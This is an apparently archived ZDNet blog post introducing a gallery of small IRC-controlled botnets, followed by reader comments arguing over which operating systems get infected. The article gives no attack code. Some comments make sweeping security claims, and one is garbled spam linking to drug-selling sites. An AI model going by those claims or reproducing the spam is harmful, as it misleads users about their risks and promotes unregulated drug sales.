Inside the botnets that never make the news - a gallery

Inside the botnets that never make the news - a gallery

Summary: If you ever wanted to take an inside view of targeted-botnets primarily run by novice cybercriminals sometimes utilizing outdated, but very effective methods - this ZDNet photo gallery is for you.It offers an inside view of those "beneath the radar" botnets that never make the news.

SHARE:
TOPICS: Security
90

If you ever wanted to take an inside view of targeted-botnets primarily run by novice cybercriminals sometimes utilizing outdated, but very effective methods - this ZDNet photo gallery is for you.

It offers an inside view of those "beneath the radar" botnets that never make the news. The images have been collected throughout the past year by using open source intelligence, namely, by either joining the command and control IRC channel upon infection, or monitoring ongoing communications between the botnet masters.

Why are small botnets so important anyway, and shouldn't we keep an eye on the big ones such as Conficker, Torpig or the rest of the eye-popping ones? Smaller botnets are usually underestimated ones, however, they're perfectly suitable for targeted attacks such as the recently exposed GhostNet espionage network. Moreover, despite the massive botnets run by sophisticated cybercriminals, evidence in the past (Storm Worm Hosting Pharmaceutical Scams; Money Mule Recruiters use ASProx's Fast Fluxing Services; Inside the Srizbi Botnet Business Model) clearly indicates that they're partitioning the botnets and reselling pieces of the pie to other cybercriminals, which would then simply remove the original malware and introduce one of their own.

These small botnets are also exclusively used for some of the sophisticated managed spam services currently offered on the underground marketplace. For instance, the managed spamming service exclusivelly profiled by Zero Day last year, was using only 5000 infected hosts for the purpose of sending 1 million spam messages. Another variation of it was offering only 1672 infected hosts, and was still capable of spamming 3215 emails per minute.

For the time being, the massive botnets we're used to seeing aren't going away, but in the long term the cybercriminals behind them could easily start splitting/partitioning them for operational security, and in order to avoid potential mass hijacking from competing cybecriminals or security researchers - the malicious economies of scale that cybercriminals achieve by standardizing the exploitation process also means that their crimeware botnets are vulnerable to the logical monocultural insecurities.

What do you think?

Topic: Security

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

90 comments
Log in or register to join the discussion
  • Botnets

    These are WINDOWS botnets. The article never says that. If you don't
    run windows your computer is not part of a botnet.

    Just stop using Windows on line. It is great for off line programs, but
    switch OS's to go on line.
    gertruded
    • Guess you missed...

      ... that article a few weeks back of a growing Apple Botnet? Do some research before spreading FUD. I'll help. Here's a few links for ya:

      http://blogs.zdnet.com/security/?p=3157
      http://www.itpro.co.uk/610552/zombie-macs-launching-botnet-attacks

      "The views expressed here are mine and do not reflect the official opinion of my employer or the organization through which the Internet was accessed."
      gnesterenko
      • You conveniently ignore...

        ... the fact that every one of those compromised
        machines was compromised by the user--downloading
        pirated and hacked software. Not a single machine using
        legal software is compromised... Yet.
        Vulpinemac
        • But....

          the same thing happens on Windows as well. You seem to believe thata fully patched and up to date PC will magically grow a botnet.

          And a lot of them are through social engineering.

          But I admit that some happen through infected web sites as well.
          Average-IT-Guy
          • Social Engineering

            "And a lot of [infections] are through social engineering."

            Exactly.

            It's been said many times, but it needs to be said again and again until people get it: These days, the biggest security vulnerability is probably the person operating the computer. And the truth is that the program has not yet been made that would protect people from their foolishness or willingness to engage in fisticuffs with primates for cash and fabulous prizes.

            Then again, maybe magical immunity to botnets is a secret feature of the RDF.
            Third of Five
        • i didn't ignore anything

          I was responding to this initial statement:

          "These are WINDOWS botnets. The article never says that. If you don't run windows your computer is not part of a botnet."

          Which is a false statement, per the artciles sited. Nothing was said about how they were infected, just that they were.

          "The views expressed here are mine and do not reflect the official opinion of my employer or the organization through which the Internet was accessed."
          gnesterenko
          • But 9999 times out of 10,000 the problem IS on (because of) Windows [NT]

            -
            Mikael_z
      • RE: Inside the botnets that never make the news - a gallery

        Altogether they may around about it is become by absolutely approximate with the aim of also do even develop
        <a href="http://www.phenobestin.com/s-4-adipex.aspx">Adipex</a> / <a href="http://www.phenobestin.com/s-7-phentermine.aspx">Phentermine</a>
        cheap phentermine 37.5
    • ...

      And the fanboys start...
      TechBoyZ
      • 2 true...

        Windows this Mac that Linux rules... It is all about the users. Too many users are just clueless. And too many of those are in management...
        agohige
    • Windows Box as a Server?

      Ha ha ha.

      Why would the biggest-virus-magnet-ever-built be used as server?

      Are you people that ignorant?

      Yeah, why does this article not even mention that is about windowz boxes? (unprofessional)
      jrbeaman
    • Who is this fool?

      Since 2007, Impressive.
      This article was very disjointed. Not many facts, but a lot of key words.
      How about some facts? If we have a AV in place, what are our risks? Files to look for? Asshole!
      sfaid
  • RE: Inside the botnets that never make the news - a gallery

    gertruded is right. I see a lot about "computer viruses", when they are really windows viruses. Identify the platform they damage, whic is normally windows.
    ator1940
    • Platform they damage?

      They don't damage any platform. This article is not a Mac>>>>>Windows>>>>>Linux piece. The damage is to people, to webservers (which are usually Linux, n'est pas?), to people information and such like that.

      Even then with it being windows...you know..which version of windows are they working on? Is it XP or Vista? What about Windows 7?

      BotNets will be targeted at the most popular OS - which is software inceidently - The platform is the the hardware I would expect (of which all three OSs work happily on). But I digress. If OSX was the most common OS then you'd find this article would be taken as directed at that OS. Same for Linux.

      So you pointing out that "Wah wah wah wah you don't say which OS" really seem very petty and quite stupid.

      Average-IT-Guy
      • ery petty and quite stupid

        The standard Microsoft shill tactic on this board--always attack the
        person, not the unfavorable message.

        The fact is that if you are not running Windows then you are not part of a
        bot network. Even if the specious argument about Windows being
        attacked only because it is the most popular were true, the facts do not
        change.

        You are much safer on the internet if you use an OS other than Windows,
        much, much safer.
        gertruded
        • No Windoze = no software

          I do cross platform programming every day and the fact remains that if you are not running Windows you are shut out of 95% of all available software. If you are running Linux whole segments go completely uncovered. For example there is not a single decent audio editor out there (Audacity? - oh please) and no real video editor that doesn't crash every five minutes (There is only one real editor as it is).

          Try playing most of the latest games and you will find they do not run under Linux, Wine or not. DX 9 or 10 can no longer be emulated OpenGL.

          Hey, you are safe when you unplug the box. That is another solution. If you do a lot of diverse computing, Linux is not the answer. And yes, Macs are plenty infected, too.
          rernst99
          • You are right, but...

            At the medical office I work at, none of the business apps used for scheduling, billing, and patient records, work on either Linux, or Mac. And good luck finding ones that do. I cater to the Mac users here only because the Macs provide Windows through Boot Camp. Linux is nowhere to be found, save for the the occasional LiveCD I play around with. And that's the point. Sad though it may be, most every day use software is developed for Windows. Believe me, I would drop MS and their expensive BS licensing in a heartbeat if I could.
            daveaaa3
          • No medical apps for Mac?

            Funny both my doctor, and my dentist are all-Mac offices. I guess
            they
            must do without scheduling, billing, and patient record apps?

            I don't know what they use - but they are running in OS X, not
            Windows via boot camp.

            Not to distract from the botnet topic with further fanboi arguments
            one way or another. It just seems the argument that 95% of software is
            designed for Windows gets tossed around a lot. I work on Windows
            and OS X (and play a bit with Linux). And I don't find much missing on
            Mac at least, outside of the latest games. Which I seldom have time to
            play anyway.
            rx7racer
          • And it's this kind of captive Winbloze audience thinking...

            ...that keeps the bot-net boys happy.

            And yeah, I've used Audacity before. Great program. You obviously don't know how to use it.
            Wintel BSOD
        • not at all

          In fact its been stated repeatedly on multiple articles that OSX is the single most vulnurable system out there, no matter what broswer you are running. Including Firefox, because OSX has no lairs of security technology for the browser to draw on. In fact, the safest way to browse is with Firefox on a Windows machine.

          And if youare still worried, install NoScript addon for Firefox and you are immune to ANY web-based attack. Period. Not to mention it speeds browsing up significantly by preventing all non-essential scripts from loading. Its not just the OS you are running - the the OS/Browser combination that makes a difference.


          I should say that you aren't IMMUNE to any attack. No software prevents you from social engeneering attacks. This is a given, of course, but just thought I'd cover my tracks before the zealots set upon them.

          "The views expressed here are mine and do not reflect the official opinion of my employer or the organization through which the Internet was accessed."
          gnesterenko